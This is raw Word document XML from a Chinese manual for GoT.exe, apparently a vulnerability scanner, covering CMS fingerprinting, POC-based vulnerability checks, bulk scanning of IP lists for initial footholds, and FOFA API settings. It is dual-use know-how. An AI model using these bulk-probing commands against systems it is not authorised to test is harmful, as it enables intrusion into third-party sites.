          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BD046B2" w14:textId="2895DF03" w:rsidR="00FF0906" w:rsidRDefault="00FF0906" w:rsidP="00FF0906">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>-test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6883" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60350C7A" w14:textId="2D5F0967" w:rsidR="00FF0906" w:rsidRDefault="00FF0906" w:rsidP="00FF0906">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>返回POC编写高级函数中，变量的值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2ADF3EE8" w14:textId="77777777" w:rsidR="00FF0906" w:rsidRDefault="00FF0906" w:rsidP="00FF0906">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A06EBA7" w14:textId="5CBB5BAD" w:rsidR="009F60F5" w:rsidRPr="009F60F5" w:rsidRDefault="009F60F5" w:rsidP="009F60F5">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F60F5">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.1.1 </w:t>
      </w:r>
      <w:r w:rsidR="007916F4">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>辅助</w:t>
      </w:r>
      <w:r w:rsidRPr="009F60F5">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>输出详情信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF73C1A" w14:textId="5E2E1AF5" w:rsidR="00FF0906" w:rsidRDefault="00FF0906" w:rsidP="00FF0906">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38912E8A" w14:textId="704FA837" w:rsidR="00FF0906" w:rsidRPr="00145F0E" w:rsidRDefault="00FF0906" w:rsidP="00FF0906">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">GoT.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sniff -u https://</w:t>
      </w:r>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/#/login -body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499E5CBB" w14:textId="74C83A33" w:rsidR="009F60F5" w:rsidRDefault="009F60F5" w:rsidP="00FF0906">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出header ,body ,status_code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74279982" w14:textId="46571BBD" w:rsidR="009F60F5" w:rsidRDefault="009F60F5" w:rsidP="00FF0906">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16D00BFC" wp14:editId="27CC6FB1">
            <wp:extent cx="5274310" cy="3830320"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8677295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72950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2EA8" w14:textId="29032126" w:rsidR="00FF0906" w:rsidRDefault="009F60F5" w:rsidP="00FF0906">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="781B777B" wp14:editId="00725119">
            <wp:extent cx="5274310" cy="807085"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="195017124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71246" name="图片 1" descr="文本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9ABD" w14:textId="73C0BEBF" w:rsidR="009F60F5" w:rsidRDefault="007916F4" w:rsidP="00FF0906">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测漏洞信息命令如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9D4422" w14:textId="5315EB13" w:rsidR="009F60F5" w:rsidRPr="00145F0E" w:rsidRDefault="009F60F5" w:rsidP="00FF0906">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>GoT.</w:t>
      </w:r>
      <w:r w:rsidR="007916F4" w:rsidRPr="00145F0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>attempt -condition vuln="</w:t>
      </w:r>
      <w:r w:rsidR="00040B68" w:rsidRPr="00145F0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>漏洞名称</w:t>
      </w:r>
      <w:r w:rsidR="00040B68" w:rsidRPr="00145F0E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>" -u https://</w:t>
      </w:r>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:8443 -body</w:t>
      </w:r>
      <w:r w:rsidR="007916F4" w:rsidRPr="00145F0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C668BB" w14:textId="333B8700" w:rsidR="007916F4" w:rsidRDefault="007916F4" w:rsidP="00FC20C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DB6D21C" wp14:editId="0602362A">
            <wp:extent cx="3920726" cy="2346960"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="11551588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15881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36788" cy="23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103A" w14:textId="79B42EAA" w:rsidR="00145F0E" w:rsidRDefault="00145F0E" w:rsidP="00145F0E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.1.2 漏洞高级函数输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2302AF91" w14:textId="25C8EFD1" w:rsidR="00145F0E" w:rsidRDefault="00145F0E" w:rsidP="00145F0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有时候咱们编写POC不知道高级函数变量的值是多少（也就是regex和json），不知道匹配的值是多少时，可以使用test函数进行测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592840E8" w14:textId="31D4FCCF" w:rsidR="00145F0E" w:rsidRPr="00145F0E" w:rsidRDefault="00145F0E" w:rsidP="00145F0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">GoT.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>attempt -condition vuln="</w:t>
      </w:r>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>漏洞名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> " -u https://</w:t>
      </w:r>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:8443 -</w:t>
      </w:r>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBA2C2A" w14:textId="5387B82D" w:rsidR="00145F0E" w:rsidRDefault="00145F0E" w:rsidP="00FC20C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8B17EE0" wp14:editId="78D3A223">
            <wp:extent cx="5274310" cy="1394460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="36030101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01016" name="图片 1" descr="文本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ED9C" w14:textId="77777777" w:rsidR="00145F0E" w:rsidRDefault="00145F0E" w:rsidP="00145F0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C566C9E" w14:textId="666E07DD" w:rsidR="00DA7B80" w:rsidRPr="00DA7B80" w:rsidRDefault="00DA7B80" w:rsidP="00DA7B80">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA7B80">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>高级功能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DA7B80" w14:paraId="57200DAF" w14:textId="77777777" w:rsidTr="00DA7B80">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="612D3444" w14:textId="6E5A0128" w:rsidR="00DA7B80" w:rsidRDefault="00DA7B80" w:rsidP="00DA7B80">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>sniff -u http://127.0.0.1 -at</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6521" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E3AF6F0" w14:textId="7C8B2F71" w:rsidR="00DA7B80" w:rsidRPr="00DA7B80" w:rsidRDefault="00DA7B80" w:rsidP="00145F0E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>寻找到cms随后根据cms验证漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA7B80" w14:paraId="09A93482" w14:textId="77777777" w:rsidTr="00DA7B80">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03B9CAC5" w14:textId="0D29BF1B" w:rsidR="00DA7B80" w:rsidRDefault="00DA7B80" w:rsidP="00145F0E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>sniff -f ip.txt -at</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6521" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09A49307" w14:textId="6A91621E" w:rsidR="00DA7B80" w:rsidRDefault="00DA7B80" w:rsidP="00145F0E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>批量验证cms和漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA7B80" w14:paraId="1C69ACF7" w14:textId="77777777" w:rsidTr="00DA7B80">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E4D0651" w14:textId="7A57EBE5" w:rsidR="00DA7B80" w:rsidRDefault="00DA7B80" w:rsidP="00145F0E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>sniff -f ip.txt -n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6521" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BF8372E" w14:textId="41704807" w:rsidR="00DA7B80" w:rsidRDefault="00DA7B80" w:rsidP="00145F0E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不进行漏洞验证和域名ip信息验证，只测试网站存活和cms信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A77CA" w14:paraId="536C6B14" w14:textId="77777777" w:rsidTr="00DA7B80">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FF4DD1B" w14:textId="23926DC1" w:rsidR="001A77CA" w:rsidRDefault="001A77CA" w:rsidP="00145F0E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>-export csv=文件名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6521" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FD32CDA" w14:textId="4A723F21" w:rsidR="001A77CA" w:rsidRDefault="001A77CA" w:rsidP="00145F0E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>导出信息到csv文件中，以后会支持更多文件格式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72E606D8" w14:textId="2DD872AC" w:rsidR="00DA7B80" w:rsidRPr="00FC20C9" w:rsidRDefault="00FC20C9" w:rsidP="00FC20C9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC20C9">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>3.2.1 打点漏洞探测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EDFA51" w14:textId="1621E831" w:rsidR="00FC20C9" w:rsidRDefault="00FC20C9" w:rsidP="00FC20C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用GoT.exe sniff </w:t>
      </w:r>
      <w:r w:rsidRPr="00E121F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">-f </w:t>
      </w:r>
      <w:r w:rsidRPr="007211EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00E121F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> -at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -export csv=xxx 对资产进行漏洞探测，原理是先从指纹库识别指纹，随后通过指纹寻找指纹相关漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00212ECC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，随后输出到csv文件中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1648CE" w14:textId="3238F3D6" w:rsidR="00FC20C9" w:rsidRPr="00FC20C9" w:rsidRDefault="00FC20C9" w:rsidP="00FC20C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DEF1F66" wp14:editId="7D965965">
            <wp:extent cx="4235743" cy="3400425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7961544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5444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7914" cy="341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5776" w14:textId="01429292" w:rsidR="00FC20C9" w:rsidRPr="00FC20C9" w:rsidRDefault="00FC20C9" w:rsidP="00145F0E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BF070EE" w14:textId="087FE748" w:rsidR="00FC20C9" w:rsidRDefault="00FC20C9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC20C9">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>3.2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> 指纹批量探测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60626FCB" w14:textId="02B5E255" w:rsidR="00650564" w:rsidRDefault="00650564" w:rsidP="00FE722E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GoT.exe sniff </w:t>
      </w:r>
      <w:r w:rsidRPr="00415B3E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">-f </w:t>
      </w:r>
      <w:r w:rsidRPr="00B83F59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ip.txt </w:t>
      </w:r>
      <w:r w:rsidRPr="00415B3E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -export csv=xxx 对ip.txt的ip进行指纹探测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E41616F" w14:textId="7802B374" w:rsidR="00212ECC" w:rsidRPr="00FE722E" w:rsidRDefault="00212ECC" w:rsidP="00212EC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AAB636D" wp14:editId="4B9DFA56">
            <wp:extent cx="5274310" cy="2454910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="637394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39429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0C2C" w14:textId="61D11DDD" w:rsidR="00145F0E" w:rsidRDefault="00145F0E" w:rsidP="00145F0E">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>四，</w:t>
      </w:r>
      <w:r w:rsidRPr="00145F0E">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>setting.json文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5F98FF" w14:textId="77777777" w:rsidR="00FF3E9B" w:rsidRPr="00FF3E9B" w:rsidRDefault="00FF3E9B" w:rsidP="00FF3E9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FF3E9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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7D4063" w14:textId="77777777" w:rsidR="00FF3E9B" w:rsidRPr="00FF3E9B" w:rsidRDefault="00FF3E9B" w:rsidP="00FF3E9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FF3E9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FF3E9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"concurrency"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3E9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:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3E9B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50</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3E9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, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521BCFF5" w14:textId="77777777" w:rsidR="00FF3E9B" w:rsidRPr="00FF3E9B" w:rsidRDefault="00FF3E9B" w:rsidP="00FF3E9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FF3E9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FF3E9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"response_time"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3E9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:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3E9B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10</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3E9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</w:p>
    <w:p w14:paraId="1005DA79" w14:textId="77777777" w:rsidR="00FF3E9B" w:rsidRPr="00FF3E9B" w:rsidRDefault="00FF3E9B" w:rsidP="00FF3E9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FF3E9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FF3E9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"fofa_email"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3E9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:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3E9B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"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3E9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</w:p>
    <w:p w14:paraId="4B9B2015" w14:textId="77777777" w:rsidR="00FF3E9B" w:rsidRPr="00FF3E9B" w:rsidRDefault="00FF3E9B" w:rsidP="00FF3E9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FF3E9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FF3E9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"fafa_key"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3E9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:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3E9B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"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3E9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</w:p>
    <w:p w14:paraId="192AB473" w14:textId="77777777" w:rsidR="00FF3E9B" w:rsidRPr="00FF3E9B" w:rsidRDefault="00FF3E9B" w:rsidP="00FF3E9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FF3E9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FF3E9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"fofa_size"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3E9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:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3E9B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10000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16596C0F" w14:textId="77777777" w:rsidR="00FF3E9B" w:rsidRDefault="00FF3E9B" w:rsidP="00FF3E9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FF3E9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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715A5E33" w14:textId="77777777" w:rsidR="00A3418C" w:rsidRPr="00FF3E9B" w:rsidRDefault="00A3418C" w:rsidP="00A3418C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsi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FF3E9B" w14:paraId="1896C3A4" w14:textId="77777777" w:rsidTr="00FF3E9B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E146B61" w14:textId="7A5BC64F" w:rsidR="00FF3E9B" w:rsidRDefault="00FF3E9B" w:rsidP="00FF3E9B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF3E9B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6458" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="606833C4" w14:textId="07C7D02D" w:rsidR="00FF3E9B" w:rsidRDefault="00FF3E9B" w:rsidP="00FF3E9B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>并发数</w:t>
            </w:r>
            <w:r w:rsidR="00F70D54">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，默认50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF3E9B" w14:paraId="02879DA0" w14:textId="77777777" w:rsidTr="00FF3E9B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6ADC3175" w14:textId="2A2312EF" w:rsidR="00FF3E9B" w:rsidRDefault="00FF3E9B" w:rsidP="00FF3E9B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
